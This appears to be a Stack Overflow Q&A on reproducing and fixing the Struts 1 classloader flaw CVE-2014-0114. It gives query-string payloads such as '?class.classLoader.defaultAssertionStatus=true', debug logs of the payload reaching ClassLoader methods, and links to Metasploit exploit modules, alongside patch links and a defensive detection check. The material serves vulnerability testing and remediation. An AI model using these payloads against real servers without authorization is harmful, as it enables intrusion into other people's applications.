Classloader vulnerability reproducing procedure in struts 1.1

Question

In Struts1, I heard that there is a classloader vulnerability issue which is cause by CVE-2014-0114. But I am unable to reproduce this respect to my project. Can anyone help me how to reproduce this issue. I googled but not get any procedure of reproducing.

I am using struts-1.1, Jboss -4.2.3.GA, Apache 2.2.0, MySql 5.0.37, JKMod, JDK 1.6.0_12, Ant 1.7.0 for my web project.

score 11 · Accepted Answer · edited May 05 '14 at 09:19

Try to invoke a URL which is mapped to a struts action (backed by an action form). The framework will try to populate your form bean from query parameters. So if you have a query parameter like ?class.classLoader.defaultAssertionStatus=true, it translates to formBean.getClass().getClassLoader().setDefaultAssertionStatus(true).

If you have enabled debug logging, you would see the following messages:

2014-05-05 12:57:50,238 DEBUG [org.apache.struts.action.RequestProcessor]  Populating bean properties from this request
2014-05-05 12:57:50,238 DEBUG [org.apache.commons.beanutils.BeanUtils] BeanUtils.populate(com.xxx.struts.demo.web.form.SimpleForm@71909bc, {class.classLoader.defaultAssertionStatus=[Ljava.lang.String;@a6b23fd4})
2014-05-05 12:57:50,238 DEBUG [org.apache.commons.beanutils.BeanUtils]   setProperty(com.xxx.struts.demo.web.form.SimpleForm@71909bc, class.classLoader.defaultAssertionStatus, [true])
2014-05-05 12:57:50,246 DEBUG [org.apache.commons.beanutils.BeanUtils]     Target bean = com.ibm.ws.classloading.internal.AppClassLoader@3ac10955
2014-05-05 12:57:50,246 DEBUG [org.apache.commons.beanutils.BeanUtils]     Target name = defaultAssertionStatus
2014-05-05 12:57:50,250 DEBUG [org.apache.commons.beanutils.ConvertUtils] Convert string 'true' to class 'boolean'
2014-05-05 12:57:50,250 DEBUG [org.apache.commons.beanutils.ConvertUtils]   Using converter org.apache.commons.beanutils.converters.BooleanConverter@de2943ef
2014-05-05 12:57:50,250 DEBUG [org.apache.commons.beanutils.PropertyUtils] setSimpleProperty: Invoking method public void java.lang.ClassLoader.setDefaultAssertionStatus(boolean) with value true (class java.lang.Boolean)

for example - http:///struts-demo/demo.do?class.classLoader.defaultAssertionStatus=true. — Kishore Kirdat, May 05 '14 at 10:12
Thanks. But I'm still unclear why turning on default assertions would cause a denial of service issue. — Patrice Gagnon, May 19 '14 at 16:07
The vulnerability allows an attacker to manipulate classloader properties. The actual impact hence depends on application containers as each container (classloader) exposes their own properties. — Kishore Kirdat, May 20 '14 at 15:13
What version of Struts and BeanUtils have you used to get that output? My output is different: I get `BeanUtils.populate` and `Convert string`, but `setSimpleProperty` is not logged. — Pino, Oct 03 '14 at 18:49

score 2 · Answer 2 · answered Jun 16 '14 at 12:14

I have tried in more than 2 ways to reproducing purpose. It works fine.

http://127.0.0.1:8080/MyFormGroupEditSection.do?com.macao.DelphyHacker.Marathonclass.marathonId=34&groupId=862
http://127.0.0.1:8080/MyFormGroupEditSection.do?class.classLoader=true&groupId=862

For solution purpose of this problem, I want to add some comments. You can follow this 2 links. Hopefully, it will help you to eradicate this problem.

http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro

http://mail-archives.apache.org/mod_mbox/struts-announcements/201405.mbox/%3C53629980.8060805%40apache.org%3E

Another fix is at https://github.com/apache/struts1/pull/1 (see http://openwall.com/lists/oss-security/2014/06/15/10 for reference). — Pino, Oct 02 '14 at 15:34

score 1 · Answer 3 · answered Sep 26 '14 at 09:05

A Metasploit-based exploit is available on GitHub: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_classloader.rb and also at http://downloads.securityfocus.com/vulnerabilities/exploits/65999.rb. See http://www.rapid7.com/db/modules/exploit/multi/http/struts_code_exec_classloader for reference.

score 0 · Answer 4 · edited Dec 14 '15 at 15:06

0

Further to the solutions above I wanted to point out that adding a breakpoint in the ClassLoader at the line defaultAssertionStatus = enabled; within setDefaultAssertionStatus and a watcher at the line private boolean defaultAssertionStatus = false; is a great way of verifying if the above url modification: ?class.classLoader.defaultAssertionStatu‌s=true has worked your defaultAssertionStatus should now be true.

Hope this helps!

edited Dec 14 '15 at 15:06

Sjon

4,989
6
28
46

answered Dec 14 '15 at 13:49

Rebecca Douglas

429
1
5
16

This does not provide an answer to the question. To critique or request clarification from an author, leave a comment below their post - you can always comment on your own posts, and once you have sufficient [reputation](http://stackoverflow.com/help/whats-reputation) you will be able to [comment on any post](http://stackoverflow.com/help/privileges/comment). - [From Review](/review/low-quality-posts/10555562) – Toby Speight Dec 14 '15 at 14:12
I do not have enough rep and wanted to share this as I couldn't find an easy solution to testing if the URL works. The breakpoints I've specified above does the job. – Rebecca Douglas Dec 14 '15 at 14:44

score 0 · Answer 5 · answered Sep 11 '18 at 14:38

Something like this works to test (in code at least)

      try {
        PropertyUtils.getNestedProperty(this, "class");
        Logger.error(this, "SECURITY ISSUE- `class` attribute NOT DISABLED for BeanUtil introspection, See: CVE-2014-0114 ");
      } catch (java.lang.NoSuchMethodException nse) {
        Logger.info(this, "`class` is disabled as a property for introspection in struts for security");
      } catch (Exception e) {
        Logger.warn(this, e.getMessage(), e);
      }

Classloader vulnerability reproducing procedure in struts 1.1

5 Answers5